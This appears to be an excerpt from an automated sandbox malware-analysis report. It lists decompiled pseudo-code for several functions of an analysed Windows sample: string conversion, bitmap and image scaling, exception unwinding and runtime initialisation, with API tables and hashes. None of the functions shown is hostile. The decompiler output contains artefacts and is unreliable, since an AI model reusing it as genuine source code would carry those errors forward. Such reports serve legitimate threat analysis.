                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: File$Create$CloseHandleTime
                                            • String ID:
                                            • API String ID: 2287278272-0
                                            • Opcode ID: 1b9576beb3db7640217118e81cb736db42cd7464c69d46155cebbdbf40f5d9bd
                                            • Instruction ID: 0cf2dbd7ecbae3949db883a503fb096953df90af18b72190c17606f80dd32d3d
                                            • Opcode Fuzzy Hash: 1b9576beb3db7640217118e81cb736db42cd7464c69d46155cebbdbf40f5d9bd
                                            • Instruction Fuzzy Hash: 1E41CE31258381AAE735EF64DC45BAEBBE8AB85700F04091DF5E2D31D1C6B4DA48EB53
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C5B5EA, Relevance: 6.1, APIs: 4, Instructions: 110COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 85%
                                            			E00C5B5EA(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags, intOrPtr _a4, int _a8, char* _a12, int _a16, short* _a20, int _a24, intOrPtr _a28) {
				signed int _v8;
				int _v12;
				char _v16;
				intOrPtr _v24;
				char _v28;
				void* _v40;
				signed int _t34;
				signed int _t40;
				int _t46;
				int _t53;
				void* _t55;
				int _t57;
				signed int _t63;
				int _t67;
				short* _t69;
				signed int _t70;
				short* _t71;

				_t34 =  *0xc6d668; // 0x13bcba52
				_v8 = _t34 ^ _t70;
				E00C53356(__ebx,  &_v28, __edx, _a4);
				_t57 = _a24;
				if(_t57 == 0) {
					_t6 = _v24 + 8; // 0x31e85006
					_t53 =  *_t6;
					_t57 = _t53;
					_a24 = _t53;
				}
				_t67 = 0;
				_t40 = MultiByteToWideChar(_t57, 1 + (0 | _a28 != 0x00000000) * 8, _a12, _a16, 0, 0);
				_v12 = _t40;
				if(_t40 == 0) {
					L15:
					if(_v16 != 0) {
						 *(_v28 + 0x350) =  *(_v28 + 0x350) & 0xfffffffd;
					}
					return E00C4E203(_t67, _v8 ^ _t70);
				}
				_t55 = _t40 + _t40;
				asm("sbb eax, eax");
				if((_t55 + 0x00000008 & _t40) == 0) {
					_t69 = 0;
					L11:
					if(_t69 != 0) {
						E00C4E920(_t67, _t69, _t67, _t55);
						_t46 = MultiByteToWideChar(_a24, 1, _a12, _a16, _t69, _v12);
						if(_t46 != 0) {
							_t67 = GetStringTypeW(_a8, _t69, _t46, _a20);
						}
					}
					L14:
					E00C5980D(_t69);
					goto L15;
				}
				asm("sbb eax, eax");
				_t48 = _t40 & _t55 + 0x00000008;
				_t63 = _t55 + 8;
				if((_t40 & _t55 + 0x00000008) > 0x400) {
					asm("sbb eax, eax");
					_t69 = E00C57A8A(_t63, _t48 & _t63);
					if(_t69 == 0) {
						goto L14;
					}
					 *_t69 = 0xdddd;
					L9:
					_t69 =  &(_t69[4]);
					goto L11;
				}
				asm("sbb eax, eax");
				E00C60EE0();
				_t69 = _t71;
				if(_t69 == 0) {
					goto L14;
				}
				 *_t69 = 0xcccc;
				goto L9;
			}




















                                            0x00c5b5f2
                                            0x00c5b5f9
                                            0x00c5b605
                                            0x00c5b60a
                                            0x00c5b60f
                                            0x00c5b614
                                            0x00c5b614
                                            0x00c5b617
                                            0x00c5b619
                                            0x00c5b619
                                            0x00c5b61e
                                            0x00c5b637
                                            0x00c5b63d
                                            0x00c5b642
                                            0x00c5b6e1
                                            0x00c5b6e5
                                            0x00c5b6ea
                                            0x00c5b6ea
                                            0x00c5b706
                                            0x00c5b706
                                            0x00c5b648
                                            0x00c5b650
                                            0x00c5b654
                                            0x00c5b6a0
                                            0x00c5b6a2
                                            0x00c5b6a4
                                            0x00c5b6a9
                                            0x00c5b6c0
                                            0x00c5b6c8
                                            0x00c5b6d8
                                            0x00c5b6d8
                                            0x00c5b6c8
                                            0x00c5b6da
                                            0x00c5b6db
                                            0x00000000
                                            0x00c5b6e0
                                            0x00c5b65b
                                            0x00c5b65d
                                            0x00c5b65f
                                            0x00c5b667
                                            0x00c5b684
                                            0x00c5b68e
                                            0x00c5b693
                                            0x00000000
                                            0x00000000
                                            0x00c5b695
                                            0x00c5b69b
                                            0x00c5b69b
                                            0x00000000
                                            0x00c5b69b
                                            0x00c5b66b
                                            0x00c5b66f
                                            0x00c5b674
                                            0x00c5b678
                                            0x00000000
                                            0x00000000
                                            0x00c5b67a
                                            0x00000000

                                            APIs
                                            • MultiByteToWideChar.KERNEL32(?,00000000,31E85006,00C534E6,00000000,00000000,00C5451B,?,00C5451B,?,00000001,00C534E6,31E85006,00000001,00C5451B,00C5451B), ref: 00C5B637
                                            • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 00C5B6C0
                                            • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 00C5B6D2
                                            • __freea.LIBCMT ref: 00C5B6DB
                                              • Part of subcall function 00C57A8A: RtlAllocateHeap.NTDLL(00000000,?,?,?,00C52FA6,?,0000015D,?,?,?,?,00C54482,000000FF,00000000,?,?), ref: 00C57ABC
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                            • String ID:
                                            • API String ID: 2652629310-0
                                            • Opcode ID: 825c3d92e5254bbf3b6392bcf804d6392e4dce2e784cd3f526e48b5345593814
                                            • Instruction ID: 395ae8c32f0f09a47182efe3188d091b676d80ad0c5801c426f83deae6ab7d10
                                            • Opcode Fuzzy Hash: 825c3d92e5254bbf3b6392bcf804d6392e4dce2e784cd3f526e48b5345593814
                                            • Instruction Fuzzy Hash: 7031E176A0020AAFDF288F65CC45EAF7BA5EB00711F184128FC14DB190EB35DE95DBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4A4F8, Relevance: 6.1, APIs: 4, Instructions: 55windowCOMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C4A4F8(void* __edx, void* __fp0) {
				intOrPtr _v20;
				intOrPtr _v24;
				void _v28;
				void* _t11;
				void* _t13;
				signed int _t18;
				signed int _t19;
				void* _t21;
				void* _t22;
				void* _t26;
				void* _t32;

				_t32 = __fp0;
				_t21 = __edx;
				_t22 = LoadBitmapW( *0xc70060, 0x65);
				_t19 = _t18 & 0xffffff00 | _t22 == 0x00000000;
				_t28 = _t19;
				if(_t19 != 0) {
					_t22 = E00C4963A(0x65);
				}
				GetObjectW(_t22, 0x18,  &_v28);
				if(E00C4952A(_t28) != 0) {
					if(_t19 != 0) {
						_t26 = E00C4963A(0x66);
						if(_t26 != 0) {
							DeleteObject(_t22);
							_t22 = _t26;
						}
					}
					_t11 = E00C4958C(_v20);
					_t13 = E00C4975D(_t21, _t32, _t22, E00C49549(_v24), _t11);
					DeleteObject(_t22);
					_t22 = _t13;
				}
				return _t22;
			}














                                            0x00c4a4f8
                                            0x00c4a4f8
                                            0x00c4a50e
                                            0x00c4a512
                                            0x00c4a515
                                            0x00c4a517
                                            0x00c4a520
                                            0x00c4a520
                                            0x00c4a529
                                            0x00c4a536
                                            0x00c4a541
                                            0x00c4a54a
                                            0x00c4a54e
                                            0x00c4a551
                                            0x00c4a553
                                            0x00c4a553
                                            0x00c4a54e
                                            0x00c4a558
                                            0x00c4a568
                                            0x00c4a570
                                            0x00c4a572
                                            0x00c4a574
                                            0x00c4a57c

                                            APIs
                                            • LoadBitmapW.USER32(00000065), ref: 00C4A508
                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00C4A529
                                            • DeleteObject.GDI32(00000000), ref: 00C4A551
                                            • DeleteObject.GDI32(00000000), ref: 00C4A570
                                              • Part of subcall function 00C4963A: FindResourceW.KERNEL32(00000066,PNG,?,?,00C4A54A,00000066), ref: 00C4964B
                                              • Part of subcall function 00C4963A: SizeofResource.KERNEL32(00000000,74855B70,?,?,00C4A54A,00000066), ref: 00C49663
                                              • Part of subcall function 00C4963A: LoadResource.KERNEL32(00000000,?,?,00C4A54A,00000066), ref: 00C49676
                                              • Part of subcall function 00C4963A: LockResource.KERNEL32(00000000,?,?,00C4A54A,00000066), ref: 00C49681
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: Resource$Object$DeleteLoad$BitmapFindLockSizeof
                                            • String ID:
                                            • API String ID: 142272564-0
                                            • Opcode ID: e57a5b7eead31d02289ce2fe9e1b8c5d16e322e96288f170998c506d60891c47
                                            • Instruction ID: a6ef33d2c9062c4f2ac184ea146c687dc3d42df2c642e1bcdf75bf290b595405
                                            • Opcode Fuzzy Hash: e57a5b7eead31d02289ce2fe9e1b8c5d16e322e96288f170998c506d60891c47
                                            • Instruction Fuzzy Hash: 47012632A8012527C72277699C46FBF776EFF89B61F080110FA00E7291DE628D0262A2
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C51A89, Relevance: 6.0, APIs: 4, Instructions: 48COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 20%
                                            			E00C51A89(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr* _a32, intOrPtr _a36, intOrPtr _a40) {
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t25;
				void* _t27;
				void* _t28;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t34;

				_t29 = __edx;
				_t27 = __ebx;
				_t36 = _a28;
				_t30 = _a8;
				if(_a28 != 0) {
					_push(_a28);
					_push(_a24);
					_push(_t30);
					_push(_a4);
					E00C520D8(__edx, _t36);
					_t34 = _t34 + 0x10;
				}
				_t37 = _a40;
				_push(_a4);
				if(_a40 != 0) {
					_push(_a40);
				} else {
					_push(_t30);
				}
				E00C4F1DB(_t28);
				_t32 = _a32;
				_push( *_t32);
				_push(_a20);
				_push(_a16);
				_push(_t30);
				E00C522DA(_t27, _t28, _t29, _t30, _t37);
				_push(0x100);
				_push(_a36);
				 *((intOrPtr*)(_t30 + 8)) =  *((intOrPtr*)(_t32 + 4)) + 1;
				_push( *((intOrPtr*)(_a24 + 0xc)));
				_push(_a20);
				_push(_a12);
				_push(_t30);
				_push(_a4);
				_t25 = E00C51893(_t29, _t32, _t37);
				if(_t25 != 0) {
					E00C4F1A9(_t25, _t30);
					return _t25;
				}
				return _t25;
			}












                                            0x00c51a89
                                            0x00c51a89
                                            0x00c51a8c
                                            0x00c51a91
                                            0x00c51a94
                                            0x00c51a96
                                            0x00c51a99
                                            0x00c51a9c
                                            0x00c51a9d
                                            0x00c51aa0
                                            0x00c51aa5
                                            0x00c51aa5
                                            0x00c51aa8
                                            0x00c51aac
                                            0x00c51aaf
                                            0x00c51ab4
                                            0x00c51ab1
                                            0x00c51ab1
                                            0x00c51ab1
                                            0x00c51ab7
                                            0x00c51abd
                                            0x00c51ac0
                                            0x00c51ac2
                                            0x00c51ac5
                                            0x00c51ac8
                                            0x00c51ac9
                                            0x00c51ad2
                                            0x00c51ad7
                                            0x00c51ada
                                            0x00c51ae0
                                            0x00c51ae3
                                            0x00c51ae6
                                            0x00c51ae9
                                            0x00c51aea
                                            0x00c51aed
                                            0x00c51af8
                                            0x00c51afc
                                            0x00000000
                                            0x00c51afc
                                            0x00c51b03

                                            APIs
                                            • ___BuildCatchObject.LIBVCRUNTIME ref: 00C51AA0
                                              • Part of subcall function 00C520D8: ___AdjustPointer.LIBCMT ref: 00C52122
                                            • _UnwindNestedFrames.LIBCMT ref: 00C51AB7
                                            • ___FrameUnwindToState.LIBVCRUNTIME ref: 00C51AC9
                                            • CallCatchBlock.LIBVCRUNTIME ref: 00C51AED
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CatchUnwind$AdjustBlockBuildCallFrameFramesNestedObjectPointerState
                                            • String ID:
                                            • API String ID: 2633735394-0
                                            • Opcode ID: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                            • Instruction ID: 2fdc5e023a2bea54593039b8280083c9b844ab63045f216680abe13b7d9e85cb
                                            • Opcode Fuzzy Hash: 7d12082e9d69d4eb274960970e4ac3fc094051ebbb053271e04eeb65a8542b8b
                                            • Instruction Fuzzy Hash: 0E012936400108BBCF129F95CC05EDA3BBAFF49715F094114FD1866120D332E9A6EBA4
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C515E6, Relevance: 6.0, APIs: 4, Instructions: 14COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 100%
                                            			E00C515E6() {
				void* _t4;
				void* _t8;

				E00C529B7();
				E00C5294B();
				if(E00C5268E() != 0) {
					_t4 = E00C51726(_t8, __eflags);
					__eflags = _t4;
					if(_t4 != 0) {
						return 1;
					} else {
						E00C526CA();
						goto L1;
					}
				} else {
					L1:
					return 0;
				}
			}





                                            0x00c515e6
                                            0x00c515eb
                                            0x00c515f7
                                            0x00c515fc
                                            0x00c51601
                                            0x00c51603
                                            0x00c5160e
                                            0x00c51605
                                            0x00c51605
                                            0x00000000
                                            0x00c51605
                                            0x00c515f9
                                            0x00c515f9
                                            0x00c515fb
                                            0x00c515fb

                                            APIs
                                            • ___vcrt_initialize_pure_virtual_call_handler.LIBVCRUNTIME ref: 00C515E6
                                            • ___vcrt_initialize_winapi_thunks.LIBVCRUNTIME ref: 00C515EB
                                            • ___vcrt_initialize_locks.LIBVCRUNTIME ref: 00C515F0
                                              • Part of subcall function 00C5268E: ___vcrt_InitializeCriticalSectionEx.LIBVCRUNTIME ref: 00C5269F
                                            • ___vcrt_uninitialize_locks.LIBVCRUNTIME ref: 00C51605
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: CriticalInitializeSection___vcrt____vcrt_initialize_locks___vcrt_initialize_pure_virtual_call_handler___vcrt_initialize_winapi_thunks___vcrt_uninitialize_locks
                                            • String ID:
                                            • API String ID: 1761009282-0
                                            • Opcode ID: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                            • Instruction ID: 49798235a38e738af0d4b46a328338845b28903fa666e6814ab7823e264a577f
                                            • Opcode Fuzzy Hash: e1efccc91d6ca86c87a370a4cfe5ee176f52a00580c29e2aebafd7fd9b0014c7
                                            • Instruction Fuzzy Hash: D9C04CAC014641541D103AB5231B7AD13C05DB37C7BCD18C1BD61271136D1649CF747E
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C4975D, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 188COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 51%
                                            			E00C4975D(void* __edx, long long __fp0, void* _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v0;
				signed int _v4;
				void _v68;
				signed int _v72;
				signed int _v76;
				char _v112;
				intOrPtr _v116;
				intOrPtr* _v120;
				short _v122;
				short _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				intOrPtr* _v140;
				char _v144;
				intOrPtr* _v152;
				intOrPtr _v156;
				intOrPtr* _v164;
				char _v180;
				intOrPtr* _v184;
				intOrPtr* _v192;
				intOrPtr* _v200;
				intOrPtr* _v212;
				signed int _v216;
				signed int _v220;
				intOrPtr* _v224;
				char _v228;
				intOrPtr _v232;
				void* __edi;
				signed int _t71;
				intOrPtr* _t77;
				void* _t78;
				intOrPtr* _t79;
				intOrPtr* _t81;
				short _t89;
				intOrPtr* _t93;
				intOrPtr* _t95;
				intOrPtr* _t97;
				intOrPtr* _t101;
				signed int _t103;
				intOrPtr* _t111;
				intOrPtr* _t113;
				intOrPtr* _t115;
				signed int _t120;
				intOrPtr _t124;
				intOrPtr* _t132;
				intOrPtr* _t134;
				void* _t146;
				void* _t149;
				signed int _t152;
				void* _t154;
				long long* _t155;
				long long _t158;

				_t158 = __fp0;
				if(E00C4960F() != 0) {
					_t146 = _a4;
					GetObjectW(_t146, 0x18,  &_v68);
					_t152 = _v4;
					_t120 = _v0;
					asm("cdq");
					_t71 = _v72 * _t152 / _v76;
					if(_t71 < _t120) {
						_t120 = _t71;
					}
					_t149 = 0;
					_push( &_v112);
					_push(0xc633ac);
					_push(1);
					_push(0);
					_push(0xc6417c);
					if( *0xc6dff4() < 0) {
						L18:
						return _t146;
					} else {
						_t77 = _v132;
						_t78 =  *((intOrPtr*)( *_t77 + 0x54))(_t77, _t146, 0, 2,  &_v128);
						_t79 = _v152;
						if(_t78 >= 0) {
							_v144 = 0;
							_push( &_v144);
							_push(_t79);
							if( *((intOrPtr*)( *_t79 + 0x28))() >= 0) {
								_t81 = _v152;
								asm("fldz");
								_push(0);
								_t124 =  *_t81;
								_push(_t124);
								_push(_t124);
								 *_t155 = _t158;
								_push(0);
								_push(0);
								_push(0xc6418c);
								_push(_v156);
								_push(_t81);
								if( *((intOrPtr*)(_t124 + 0x20))() >= 0) {
									E00C4E920(_t146,  &_v136, 0, 0x2c);
									_v136 = 0x28;
									_v132 = _t152;
									_v120 = 0;
									_v128 =  ~_t120;
									_v124 = 1;
									_t89 = 0x20;
									_v122 = _t89;
									_t154 =  *0xc6dedc(0,  &_v136, 0,  &_v180, 0, 0);
									asm("sbb ecx, ecx");
									if(( ~_t154 & 0x7ff8fff2) + 0x8007000e >= 0) {
										_t132 = _v216;
										 *((intOrPtr*)( *_t132 + 0x2c))(_t132,  &_v112);
										_t101 = _v120;
										 *((intOrPtr*)( *_t101 + 0x20))(_t101, _v220, _v116, _t120, 3);
										_t103 = _v136;
										_push(_v232);
										_t134 = _v140;
										_v220 = _t103;
										_v228 = 0;
										_v224 = 0;
										_v216 = _t120;
										_push(_t103 * _t120 << 2);
										_push(_v136 << 2);
										_push( &_v228);
										_push(_t134);
										if( *((intOrPtr*)( *_t134 + 0x1c))() < 0) {
											DeleteObject(_t154);
										} else {
											_t149 = _t154;
										}
										_t111 = _v164;
										 *((intOrPtr*)( *_t111 + 8))(_t111);
									}
									_t93 = _v212;
									 *((intOrPtr*)( *_t93 + 8))(_t93);
									_t95 = _v212;
									 *((intOrPtr*)( *_t95 + 8))(_t95);
									_t97 = _v224;
									 *((intOrPtr*)( *_t97 + 8))(_t97);
									if(_t149 != 0) {
										_t146 = _t149;
									}
									goto L18;
								}
								_t113 = _v184;
								 *((intOrPtr*)( *_t113 + 8))(_t113);
							}
							_t115 = _v192;
							 *((intOrPtr*)( *_t115 + 8))(_t115);
							_t79 = _v200;
						}
						 *((intOrPtr*)( *_t79 + 8))(_t79);
						goto L18;
					}
				}
				_push(_a12);
				_push(_a8);
				_push(_a4);
				return E00C49954();
			}
























































                                            0x00c4975d
                                            0x00c49767
                                            0x00c49782
                                            0x00c4978e
                                            0x00c49798
                                            0x00c4979f
                                            0x00c497a3
                                            0x00c497a4
                                            0x00c497aa
                                            0x00c497ac
                                            0x00c497ac
                                            0x00c497b3
                                            0x00c497b5
                                            0x00c497b6
                                            0x00c497be
                                            0x00c497bf
                                            0x00c497c0
                                            0x00c497cd
                                            0x00c49948
                                            0x00000000
                                            0x00c497d3
                                            0x00c497d3
                                            0x00c497e3
                                            0x00c497e8
                                            0x00c497ec
                                            0x00c497f9
                                            0x00c49803
                                            0x00c49804
                                            0x00c4980a
                                            0x00c4981c
                                            0x00c49820
                                            0x00c49822
                                            0x00c49823
                                            0x00c49825
                                            0x00c49826
                                            0x00c49827
                                            0x00c4982a
                                            0x00c4982b
                                            0x00c4982c
                                            0x00c49831
                                            0x00c49835
                                            0x00c4983b
                                            0x00c49851
                                            0x00c49859
                                            0x00c49863
                                            0x00c49869
                                            0x00c4986d
                                            0x00c49876
                                            0x00c4987b
                                            0x00c4987e
                                            0x00c49895
                                            0x00c4989b
                                            0x00c498a9
                                            0x00c498ab
                                            0x00c498b7
                                            0x00c498ba
                                            0x00c498cf
                                            0x00c498d2
                                            0x00c498d6
                                            0x00c498da
                                            0x00c498de
                                            0x00c498e5
                                            0x00c498e9
                                            0x00c498ed
                                            0x00c498f6
                                            0x00c49901
                                            0x00c49906
                                            0x00c49907
                                            0x00c4990d
                                            0x00c49914
                                            0x00c4990f
                                            0x00c4990f
                                            0x00c4990f
                                            0x00c4991a
                                            0x00c49921
                                            0x00c49921
                                            0x00c49924
                                            0x00c4992b
                                            0x00c4992e
                                            0x00c49935
                                            0x00c49938
                                            0x00c4993f
                                            0x00c49944
                                            0x00c49946
                                            0x00c49946
                                            0x00000000
                                            0x00c49944
                                            0x00c4983d
                                            0x00c49844
                                            0x00c49844
                                            0x00c4980c
                                            0x00c49813
                                            0x00c49816
                                            0x00c49816
                                            0x00c497f1
                                            0x00000000
                                            0x00c497f1
                                            0x00c497cd
                                            0x00c49769
                                            0x00c4976d
                                            0x00c49771
                                            0x00000000

                                            APIs
                                              • Part of subcall function 00C4960F: GetDC.USER32(00000000), ref: 00C49613
                                              • Part of subcall function 00C4960F: GetDeviceCaps.GDI32(00000000,0000000C), ref: 00C4961E
                                              • Part of subcall function 00C4960F: ReleaseDC.USER32(00000000,00000000), ref: 00C49629
                                            • GetObjectW.GDI32(?,00000018,?,00000000,?,74855B70), ref: 00C4978E
                                              • Part of subcall function 00C49954: GetDC.USER32(00000000), ref: 00C4995D
                                              • Part of subcall function 00C49954: GetObjectW.GDI32(?,00000018,?,?,?,74855B70,?,?,?,?,?,00C4977A,?,?,?), ref: 00C4998C
                                              • Part of subcall function 00C49954: ReleaseDC.USER32(00000000,?), ref: 00C49A20
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.366151758.0000000000C31000.00000020.00020000.sdmp, Offset: 00C30000, based on PE: true
                                            • Associated: 00000000.00000002.366145247.0000000000C30000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366184433.0000000000C62000.00000002.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366201007.0000000000C6D000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366208271.0000000000C74000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366214716.0000000000C90000.00000004.00020000.sdmp Download File
                                            • Associated: 00000000.00000002.366222190.0000000000C91000.00000002.00020000.sdmp Download File
                                            Similarity
                                            • API ID: ObjectRelease$CapsDevice
                                            • String ID: (
                                            • API String ID: 1061551593-3887548279
                                            • Opcode ID: 6f777fcef8ed3fbc47f3d380c00f91fb72cfe2275d8ab4aebc43eb884025a882
                                            • Instruction ID: 002c8e74f3f677cc0436cd693eefdfcea52abc40b3893c8fa91974eba65970c4
                                            • Opcode Fuzzy Hash: 6f777fcef8ed3fbc47f3d380c00f91fb72cfe2275d8ab4aebc43eb884025a882
                                            • Instruction Fuzzy Hash: C36123B1608211AFD310CF65C888E6BBBE8FF99704F10491DF59ACB260DB71E905CB62
                                            Uniqueness

                                            Uniqueness Score: -1.00%

                                            Function 00C40A9F, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 179COMMON
                                            Download Yara Rule
                                            C-Code - Quality: 17%
                                            			E00C40A9F(intOrPtr* __ecx) {
				char _v516;
				signed int _t26;
				void* _t28;
				void* _t32;
				signed int _t33;
				signed int _t34;
				signed int _t35;
				signed int _t38;
				void* _t47;
				void* _t48;

				_t41 = __ecx;
				_t44 = __ecx;
				_t26 =  *(__ecx + 0x48);
				_t47 = _t26 - 0x6f;
				if(_t47 > 0) {
					__eflags = _t26 - 0x7d;
					if(_t26 == 0x7d) {
						E00C4C339();
						_t28 = E00C3DA42(_t41, 0x96);
						return E00C49735( *0xc775d8, E00C3DA42(_t41, 0xc9), _t28, 0);
					}
				} else {
					if(_t47 == 0) {
						_push(0x456);
						L38:
						_push(E00C3DA42(_t41));
						_push( *_t44);
						L19:
						_t32 = E00C4A57D();
						L11:
						return _t32;
					}
					_t48 = _t26 - 0x16;
					if(_t48 > 0) {
						__eflags = _t26 - 0x38;
						if(__eflags > 0) {
							_t33 = _t26 - 0x39;
							__eflags = _t33;
							if(_t33 == 0) {
								_push(0x8c);
								goto L38;
							}
							_t34 = _t33 - 1;
							__eflags = _t34;
							if(_t34 == 0) {
								_push(0x6f);
								goto L38;
							}
							_t35 = _t34 - 1;
							__eflags = _t35;
							if(_t35 == 0) {
								_push( *((intOrPtr*)(__ecx + 4)));
								_push(0x406);
								goto L13;
							}
							_t38 = _t35 - 9;
							__eflags = _t38;
							if(_t38 == 0) {
								_push(0x343);
								goto L38;
							}
							_t26 = _t38 - 1;
							__eflags = _t26;
							if(_t26 == 0) {
								_push(0x86);
								goto L38;
							}
						} else {
							if(__eflags == 0) {
								_push(0x67);
								goto L38;
							}
							_t26 = _t26 - 0x17;
							__eflags = _t26 - 0xb;
							if(_t26 <= 0xb) {
								switch( *((intOrPtr*)(_t26 * 4 +  &M00C40D63))) {
									case 0:
										_push(0xde);
										goto L18;
									case 1:
										_push(0xe1);
										goto L18;
									case 2:
										_push(0xb4);
										goto L38;
									case 3:
										_push(0x69);
										goto L38;
									case 4:
										_push(0x6a);
										goto L38;
									case 5:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x68);
										goto L13;
									case 6:
										_push(0x46f);
										goto L38;
									case 7:
										_push(0x470);
										goto L38;
									case 8:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x471);
										goto L13;
									case 9:
										goto L61;
									case 0xa:
										_push( *((intOrPtr*)(__esi + 4)));
										_push(0x71);
										goto L13;
									case 0xb:
										E00C3DA42(__ecx, 0xc8) =  &_v516;
										__eax = E00C33E41( &_v516, 0x100,  &_v516,  *((intOrPtr*)(__esi + 4)));
										_push( *((intOrPtr*)(__esi + 8)));
										__eax =  &_v516;
										_push( &_v516);
										return E00C4A57D( *__esi, L"%s: %s");
								}
							}
						}
					} else {
						if(_t48 == 0) {
							_push( *__ecx);
							_push(0xdd);
							L23:
							E00C3DA42(_t41);
							L7:
							_push(0);
							L8:
							return E00C4A57D();
						}
						if(_t26 <= 0x15) {
							switch( *((intOrPtr*)(_t26 * 4 +  &M00C40D0B))) {
								case 0:
									_push( *__esi);
									_push(L"%ls");
									_push(">");
									goto L8;
								case 1:
									_push( *__ecx);
									_push(L"%ls");
									goto L7;
								case 2:
									_push(0);
									__eax = E00C49D55();
									goto L11;
								case 3:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7b);
									goto L13;
								case 4:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7a);
									goto L13;
								case 5:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x7c);
									goto L13;
								case 6:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0xca);
									goto L13;
								case 7:
									_push(0x70);
									L18:
									_push(E00C3DA42(_t41));
									_push(0);
									goto L19;
								case 8:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x72);
									goto L13;
								case 9:
									_push( *((intOrPtr*)(__esi + 4)));
									_push(0x78);
									goto L13;
								case 0xa:
									_push( *__esi);
									_push(0x85);
									goto L23;
								case 0xb:
									_push( *__esi);
									_push(0x204);
